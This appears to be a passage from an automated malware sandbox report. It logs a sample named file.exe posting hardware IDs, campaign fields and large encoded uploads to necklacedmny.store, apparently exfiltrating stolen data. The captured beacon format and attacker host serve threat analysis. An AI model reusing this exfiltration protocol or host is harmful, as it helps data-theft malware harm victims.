                                                                      2024-10-31 06:14:06 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 42 31 37 30 46 35 34 35 32 37 36 30 35 45 45 32 32 37 44 33 36 39 30 39 46 30 39 44 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7CB170F54527605EE227D36909F09D60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-31 06:14:06 UTC1011INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=7no2564676qurh71pnhefnvjoh; expires=Mon, 24-Feb-2025 00:00:45 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5dm5GyRF3oH9A6YkLEUCL6tcV0XeHyvQNPNPaGAEWByRzPrT0uDW8IliQlfK2RUX6aFObDMaXyOzClJZaYZa5r75PZeiPjMGpkSm4YuohMBMZdCpsX3nr46J7FyucR1qEOmtIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180c158d34638-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1900&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13782&delivery_rate=1636158&cwnd=251&unsent_bytes=0&cid=53b012f9a813ad48&ts=523&x=0"
                                                                      2024-10-31 06:14:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.77
                                                                      2024-10-31 06:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.549707188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:07 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15082
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:07 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 42 31 37 30 46 35 34 35 32 37 36 30 35 45 45 32 32 37 44 33 36 39 30 39 46 30 39 44 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7CB170F54527605EE227D36909F09D60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-31 06:14:07 UTC1026INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=k50k1glbjmt9dc8af80lvn1tlp; expires=Mon, 24-Feb-2025 00:00:46 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJ%2BZYu%2B%2BvVdob4O26rHPBR49uZzTrB2zCEW%2FBbdibs57HkE%2BHUKQIcc9rIH9CyoaaVk2cANq2jvKFiSB1LH2oYk7uHDlRDQ9OhbMb6n%2Bg%2FfGQWZYGzIbJ1vnVUR5TE%2Fi8BqmNWg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180c8eefc6bb3-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2516072&cwnd=251&unsent_bytes=0&cid=1cf656267a79c68d&ts=534&x=0"
                                                                      2024-10-31 06:14:07 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.77
                                                                      2024-10-31 06:14:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.549708188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:08 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20572
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 42 31 37 30 46 35 34 35 32 37 36 30 35 45 45 32 32 37 44 33 36 39 30 39 46 30 39 44 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7CB170F54527605EE227D36909F09D60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-31 06:14:08 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                      2024-10-31 06:14:09 UTC1025INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=jv8ebja1lpmc27srl003avipmt; expires=Mon, 24-Feb-2025 00:00:48 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BQjpgDipHzVQrmfsmGQbY%2BnoSUTk3dqFoRzFqQ3rd%2FGVso0NSwMRlXZ%2BcMduUJzbxACx21ZBoZY21zAJWW0vXBZkbv%2FcuR4E%2F98TTVLLP7bsD8jRx67%2F9WxvoG2d1JqKNDOmOrM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180d17db56b25-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=13&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21536&delivery_rate=2273155&cwnd=235&unsent_bytes=0&cid=2260066484edeb22&ts=691&x=0"
                                                                      2024-10-31 06:14:09 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.77
                                                                      2024-10-31 06:14:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.549709188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:10 UTC283OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1255
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:10 UTC1255OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 42 31 37 30 46 35 34 35 32 37 36 30 35 45 45 32 32 37 44 33 36 39 30 39 46 30 39 44 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7CB170F54527605EE227D36909F09D60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-31 06:14:10 UTC1012INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=mtem9gehbcjfhcnnvss175cl98; expires=Mon, 24-Feb-2025 00:00:49 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obTOf7MI3Ttk0cmLg%2Fl9yePIn0bmFZMBHXeoIsFleqB7cnzaZ6%2Bvnfkep7Uc2SuRvCqhdMCodhLZ5p6cErgynrBDZZCyWYPz7BCOnInORXlexezVGJczfWUyIW8Ge107dr3nXig%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180db2f8545ea-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2174&delivery_rate=2417362&cwnd=222&unsent_bytes=0&cid=8819bb8b509fcf17&ts=298&x=0"
                                                                      2024-10-31 06:14:10 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.77
                                                                      2024-10-31 06:14:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.549710188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:11 UTC285OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 585899
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 42 31 37 30 46 35 34 35 32 37 36 30 35 45 45 32 32 37 44 33 36 39 30 39 46 30 39 44 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7CB170F54527605EE227D36909F09D60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: 5d 79 e4 ef 92 bf a4 b4 78 92 a3 a2 1c 2c 08 fc 2c e2 9a 03 04 c0 1b 21 3b b5 5a 70 3d c4 e9 c0 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e 3b 88 b9 4f ae 5f 18 38 3e
                                                                      Data Ascii: ]yx,,!;Zp=um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYe*d7${~)7-uy%_`Mj>8^Ii9*H;(!MN;O_8>
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: 76 19 49 51 22 fd 13 e5 fb 65 d3 d8 40 83 b2 d7 f4 ce b2 5f f7 df 87 fb 65 c7 c5 c6 6e 68 9d 47 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b dd d4 58 8e 0e 60 3e a8 19
                                                                      Data Ascii: vIQ"e@_enhG> s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[X`>
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: ee 61 a9 f2 1c 15 8a e0 e1 e7 b0 93 b2 4a d7 07 ed 7a 4a 68 27 60 59 95 6b 62 fc 56 75 47 cc 0c 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd f7 1f ae c1 57 6e 7c 8f 00
                                                                      Data Ascii: aJzJh'`YkbVuG*evL!`Zxm'VT>TG.<;|d0%2b{A-=dSOS8+LWJV*S|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd|kYWn|
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: a3 d3 43 3c e7 ae c9 a5 9c 54 e8 e6 cb 4b 12 5e 68 6b 8c 9a e4 f7 a3 37 e4 24 13 bf e3 d0 40 4b 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7 f4 83 b7 ad 20 95 58 87 4b
                                                                      Data Ascii: C<TK^hk7$@KB06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@ XK
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: 57 d9 d5 30 85 f8 8a f5 b0 13 8e 9f bd 61 ab 4f 7b 13 42 bd c8 5f 2d 04 67 92 d8 bc fa c0 27 b7 a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd 8e 9e 6b 06 1a 03 4a 01 9c
                                                                      Data Ascii: W0aO{B_-g'oBRohu.-~ZMe|TY=AHk>6!rd=FrGpSXU&*e(&D[}|A+IsFJ?6LAjbH<["\<4?(wV~R]pbYkJ
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: eb 5d 89 9a cc 13 88 e8 93 68 2a 08 eb 71 a1 56 33 2b 98 71 4b c7 ee 89 ea c6 dd db ff b9 e0 91 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34 ff 00 a1 12 e6 9a 7f 30 ef
                                                                      Data Ascii: ]h*qV3+qK8_5V,{*0<b* 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~40
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: ac df fd 6e e1 4e 42 cb ba 8f 27 bb 6a ae 1f 07 df 32 f4 17 08 84 c0 ca f6 6a 15 e6 57 d9 2d bc df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65 28 c7 e0 f7 fd 81 b3 a6 a8
                                                                      Data Ascii: nNB'j2jW-Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe(
